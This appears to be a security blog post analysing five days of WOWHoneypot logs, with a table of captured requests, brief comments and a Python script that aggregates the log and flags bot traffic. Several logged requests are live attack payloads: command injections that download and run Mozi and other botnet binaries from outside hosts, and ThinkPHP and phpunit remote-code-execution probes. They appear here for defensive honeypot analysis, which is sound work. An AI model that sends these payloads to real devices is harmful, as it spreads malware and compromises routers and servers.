家studyをつづって

Notes on what I have studied about IT technology and security.

WOWHoneypot log analysis (2020/05/18-2020/05/22)

Overview

These are the aggregated results of the logs from the WOWHoneypot built in an earlier post.

Target period

2020/05/18-2020/05/22

Log aggregation

| Source | Request | Count |
|---|---|---|
| 105.155.16.59 | POST /cgi-bin/mainfunction.cgi | 1 |
| 114.67.202.10 | GET /TP/public/index.php | 1 |
| 114.67.202.10 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | 1 |
| 114.67.202.10 | POST /TP/public/index.php?s=captcha | 1 |
| 122.3.5.173 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1 | 1 |
| 128.14.134.170 | GET /solr/ | 1 |
| 131.108.4.154 | POST /boaform/admin/formPing | 1 |
| 137.135.86.214 | HEAD /robots.txt | 1 |
| 139.204.119.157 | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | 1 |
| 151.99.146.218 | POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | 1 |
| 162.243.135.242 | GET /portal/redlion | 1 |
| 162.243.137.209 | GET /hudson | 1 |
| 162.243.139.107 | GET /ReportServer | 1 |
| 162.243.143.216 | GET /portal/redlion | 1 |
| 162.243.144.248 | GET /manager/html | 3 |
| 162.243.145.56 | GET /portal/redlion | 1 |
| 162.243.145.76 | GET /portal/redlion | 3 |
| 162.244.80.180 | GET /_async/AsyncResponseServiceHttps | 6 |
| 162.244.80.180 | GET /actionHandler/ajax_network_diagnostic_tools.php | 12 |
| 162.244.80.180 | GET /admin.cgi | 6 |
| 162.244.80.180 | GET /api/backup/logout.cgi | 6 |
| 162.244.80.180 | GET /api/project/repo/log/graph/1 | 6 |
| 162.244.80.180 | GET /apply.cgi | 6 |
| 162.244.80.180 | GET /apps/a3/cfg_ethping.cgi | 6 |
| 162.244.80.180 | GET /awcuser/cgi-bin/vcs | 6 |
| 162.244.80.180 | GET /ayefeaturesconvert.js | 12 |
| 162.244.80.180 | GET /boaform/admin/formPing | 12 |
| 162.244.80.180 | GET /boardData102.php | 6 |
| 162.244.80.180 | GET /boardData103.php | 12 |
| 162.244.80.180 | GET /boardDataJP.php | 6 |
| 162.244.80.180 | GET /boardDataWW.php | 6 |
| 162.244.80.180 | GET /card_scan_decoder.php | 6 |
| 162.244.80.180 | GET /ccbill/whereami.cgi | 6 |
| 162.244.80.180 | GET /cgi-bin/admin/servetest | 12 |
| 162.244.80.180 | GET /cgi-bin/adv_remotelog.asp | 12 |
| 162.244.80.180 | GET /cgi-bin/ccbill/whereami.cgi | 6 |
| 162.244.80.180 | GET /cgi-bin/cgi_system?cmd=saveconfig | 12 |
| 162.244.80.180 | GET /cgi-bin/diagnostic.cgi | 6 |
| 162.244.80.180 | GET /cgi-bin/file_transfer.cgi | 6 |
| 162.244.80.180 | GET /cgi-bin/luci/expert/maintenance/diagnostic/nslookup | 12 |
| 162.244.80.180 | GET /cgi-bin/masterCGI | 6 |
| 162.244.80.180 | GET /cgi-bin/nobody/Search.cgi | 6 |
| 162.244.80.180 | GET /cgi-bin/pages/maintenance/logSetting/logSet.asp | 12 |
| 162.244.80.180 | GET /cgi-bin/preview_email.cgi | 6 |
| 162.244.80.180 | GET /cgi-bin/protected/discover_and_manage.cgi | 6 |
| 162.244.80.180 | GET /cgi-bin/rdfs.cgi | 6 |
| 162.244.80.180 | GET /cgi-bin/script | 6 |
| 162.244.80.180 | GET /cgi-bin/spboard/board.cgi | 12 |
| 162.244.80.180 | GET /cgi-bin/tools_time.asp | 12 |
| 162.244.80.180 | GET /cgi-bin/ViewLog.asp | 12 |
| 162.244.80.180 | GET /cgi-bin/webcm | 6 |
| 162.244.80.180 | GET /cgi-bin/webctrl.cgi | 6 |
| 162.244.80.180 | GET /command.php | 6 |
| 162.244.80.180 | GET /console/login/LoginForm.jsp | 12 |
| 162.244.80.180 | GET /diagnostic.php | 6 |
| 162.244.80.180 | GET /dnslookup.cgi | 6 |
| 162.244.80.180 | GET /dogfood/mail/spell.php | 6 |
| 162.244.80.180 | GET /globe | 6 |
| 162.244.80.180 | GET /handle_iscsi.php | 6 |
| 162.244.80.180 | GET /HNAP1 | 6 |
| 162.244.80.180 | GET /horde/imp/test.php | 6 |
| 162.244.80.180 | GET /imp/test.php | 6 |
| 162.244.80.180 | GET /incl/image_test.shtml | 6 |
| 162.244.80.180 | GET /language/Swedish | 12 |
| 162.244.80.180 | GET /login_handler.php | 12 |
| 162.244.80.180 | GET /login.cgi | 12 |
| 162.244.80.180 | GET /login.fcgi | 12 |
| 162.244.80.180 | GET /maker/snwrite.cgi | 12 |
| 162.244.80.180 | GET /moadmin/moadmin.php | 6 |
| 162.244.80.180 | GET /monitor/op5/nacoma/command_test.php | 6 |
| 162.244.80.180 | GET /NonExistence | 12 |
| 162.244.80.180 | GET /op5config/welcome | 3 |
| 162.244.80.180 | GET /page/maintenance/lanSettings/dns | 6 |
| 162.244.80.180 | GET /Pages/login.htm | 12 |
| 162.244.80.180 | GET /pages/systemcall.php | 12 |
| 162.244.80.180 | GET /picsdesc.xml | 6 |
| 162.244.80.180 | GET /ping.cgi | 6 |
| 162.244.80.180 | GET /qsrserver/device/getThumbnail | 6 |
| 162.244.80.180 | GET /repository/annotate?rev=1 | 6 |
| 162.244.80.180 | GET /scripts/ajaxPortal.lua | 6 |
| 162.244.80.180 | GET /scripts/rpc.php | 3 |
| 162.244.80.180 | GET /service/krashrpt.php | 6 |
| 162.244.80.180 | GET /setsysname.fcgi | 6 |
| 162.244.80.180 | GET /setSystemCommand | 6 |
| 162.244.80.180 | GET /setup.cgi | 12 |
| 162.244.80.180 | GET /smartdomuspad/modules/reporting/track_import_export.php | 9 |
| 162.244.80.180 | GET /softnas/snserver/snserv.php | 6 |
| 162.244.80.180 | GET /stainfo.cgi | 6 |
| 162.244.80.180 | GET /tmBlock.cgi | 6 |
| 162.244.80.180 | GET /uapi-cgi/viewer/testaction.cgi | 12 |
| 162.244.80.180 | GET /upgrade_handle.php | 6 |
| 162.244.80.180 | GET /users/%2f/%2fproc%2fself%2fcomm | 6 |
| 162.244.80.180 | GET /web/cgi-bin/usbinteract.cgi | 12 |
| 162.244.80.180 | GET /webadmin/script | 6 |
| 162.244.80.180 | GET /wp-content/plugins/dzs-videogallery/img.php | 6 |
| 167.172.158.192 | GET /phpMyAdmin/scripts/setup.php | 11 |
| 167.172.158.192 | POST /phpMyAdmin/scripts/setup.php | 11 |
| 180.116.46.6 | POST /GponForm/diag_Form?images/ | 3 |
| 181.143.221.68 | POST /cgi-bin/mainfunction.cgi | 1 |
| 185.128.41.50 | GET /manager/html | 784 |
| 186.225.180.144 | POST /cgi-bin/mainfunction.cgi | 1 |
| 192.34.60.27 | GET /index.php | 1 |
| 193.118.53.194 | GET /Telerik.Web.UI.WebResource.axd?type=rau | 1 |
| 194.190.49.175 | POST /cgi-bin/mainfunction.cgi | 1 |
| 195.54.160.123 | GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> | 10 |
| 195.54.160.123 | GET /?XDEBUG_SESSION_START=phpstorm | 10 |
| 195.54.160.123 | GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | 10 |
| 195.54.160.123 | GET /solr/admin/info/system?wt=json | 10 |
| 195.54.160.123 | GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 9 |
| 195.54.160.123 | POST /api/jsonws/invoke | 10 |
| 195.54.160.123 | POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 9 |
| 2.50.36.252 | POST /cgi-bin/mainfunction.cgi | 1 |
| 200.116.13.19 | POST /cgi-bin/mainfunction.cgi | 1 |
| 23.95.186.173 | GET http://steamcommunity.com/ | 1 |
| 42.239.113.233 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1 | 1 |
| 45.13.93.82 | CONNECT ip.ws.126.net:443 | 3 |
| 5.101.0.209 | GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> | 1 |
| 5.101.0.209 | GET /?XDEBUG_SESSION_START=phpstorm | 1 |
| 5.101.0.209 | GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | 1 |
| 5.101.0.209 | GET /solr/admin/info/system?wt=json | 1 |
| 5.101.0.209 | GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 1 |
| 5.101.0.209 | POST /api/jsonws/invoke | 1 |
| 5.101.0.209 | POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | 1 |
| 51.81.21.185 | GET /shell?cd+/tmp;rm+-rf+*;wget+%2045.56.118.219/reaper/reap.arm4;chmod+777+/tmp/reap.arm4;sh+/tmp/reap.arm4 | 1 |
| 58.217.6.136 | GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | 3 |
| 74.105.81.187 | POST /cgi-bin/mainfunction.cgi | 1 |
| 79.52.17.137 | GET /adv | 1 |
| 80.82.68.17 | GET /favicon.ico | 1 |
| 80.82.68.17 | GET /robots.txt | 1 |
| 80.82.68.69 | GET /favicon.ico | 1 |
| 80.82.68.69 | GET /robots.txt | 1 |
| 80.82.77.33 | GET /.well-known/security.txt | 3 |
| 80.82.77.33 | GET /favicon.ico | 3 |
| 80.82.77.33 | GET /robots.txt | 3 |
| 80.82.77.33 | GET /sitemap.xml | 3 |
| 86.98.19.31 | POST /boaform/admin/formPing | 3 |
| 93.147.45.242 | GET /adv | 1 |
| 93.39.97.39 | POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a | 1 |

Comments

  • "ayefeaturesconvert.js" is presumed to be an attack against D-Link routers.

    www.exploit-db.com

  • "GET /manager/html" was detected 784 times (181 times in the previous period).
    Looking at the User-Agent, it is "User-Agent: Java/1.8.0_131" or similar, so the requests are presumed to come from a bot.
    A site where User-Agent strings can be looked up:

    developers.whatismybrowser.com

  • For some reason, requests that try to make the honeypot access steamcommunity are arriving.
    "GET http://steamcommunity.com/"
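As an added example (not code from the blog or from the WOWHoneypot project), the script below reproduces the aggregation shown in the table above and the User-Agent check from the comments: it parses WOWHoneypot access_log lines, counts (source, method+path) pairs, and flags sources whose User-Agent is a runtime or library default such as "Java/1.8.0_131". The access_log layout, the sample lines and the list of bot-like User-Agent prefixes are assumptions made here.

```python
import base64
import re
from collections import Counter

# Assumed WOWHoneypot access_log layout (one request per line, not taken from the post):
# [YYYY-MM-DD HH:MM:SS+ZZZZ] src_ip:src_port dst_ip:dst_port matched base64(raw request)
LINE_RE = re.compile(r"^\[[^\]]+\] (?P<src>[\d.]+):\d+ [\d.]+:\d+ (?:True|False) (?P<b64>\S+)$")

def _req(method_path, ua):
    # Base64-encode a raw HTTP request for the constructed sample log
    raw = f"{method_path} HTTP/1.1\r\nHost: honeypot\r\nUser-Agent: {ua}\r\n\r\n"
    return base64.b64encode(raw.encode()).decode()

# Constructed sample log (not the blog's real data); IPs and paths mirror the table above
SAMPLE_LOG = "\n".join([
    f"[2020-05-18 10:00:00+0900] 185.128.41.50:40001 10.0.0.5:80 False {_req('GET /manager/html', 'Java/1.8.0_131')}",
    f"[2020-05-18 10:00:05+0900] 185.128.41.50:40002 10.0.0.5:80 False {_req('GET /manager/html', 'Java/1.8.0_131')}",
    f"[2020-05-19 03:12:45+0900] 80.82.77.33:51001 10.0.0.5:80 True {_req('GET /.well-known/security.txt', 'Mozilla/5.0')}",
    "malformed line that the parser must skip",
])

def parse_line(line):
    """Return (src_ip, request_line, headers) or None for lines that do not parse."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    try:
        raw = base64.b64decode(m["b64"], validate=True).decode("utf-8", errors="replace")
    except ValueError:  # binascii.Error is a ValueError: corrupt base64 is skipped, not fatal
        return None
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")  # request line + headers, body dropped
    headers = {}
    for h in head[1:]:
        name, sep, value = h.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return m["src"], head[0], headers

def aggregate(log_text):
    """Count (src_ip, 'METHOD /path') pairs: the same view as the table in the post."""
    counts = Counter()
    for src, request_line, _ in filter(None, map(parse_line, log_text.splitlines())):
        counts[(src, " ".join(request_line.split(" ")[:2]))] += 1  # drop the HTTP/x.y token
    return counts

# Heuristic (assumed list): runtime/library default User-Agents point to scanners, not browsers
BOT_UA_PREFIXES = ("Java/", "python-requests/", "Go-http-client/", "curl/", "libwww-perl/")

def bot_sources(log_text):
    """Source IPs whose User-Agent looks like a bot rather than a browser."""
    return {src for src, _, hdrs in filter(None, map(parse_line, log_text.splitlines()))
            if hdrs.get("user-agent", "").startswith(BOT_UA_PREFIXES)}
```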